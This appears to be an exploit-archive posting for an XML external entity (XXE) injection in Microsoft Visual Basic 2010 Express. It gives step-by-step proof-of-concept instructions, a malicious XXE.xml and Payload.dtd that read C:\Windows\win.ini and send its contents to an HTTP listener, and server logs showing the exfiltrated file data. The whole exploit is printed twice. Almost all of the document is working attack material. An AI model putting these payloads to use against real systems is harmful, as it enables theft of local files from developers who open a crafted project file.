Microsoft Visual Basic 2010 Express XML Injection

Microsoft Visual Basic 2010 Express suffers from an XML external entity injection vulnerability.


MD5 | 29b47286367b0567dffc3d07c2f2393d

# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7


[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful


[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;


[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -


Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt

# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7


[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful


[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;


[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -

Related Posts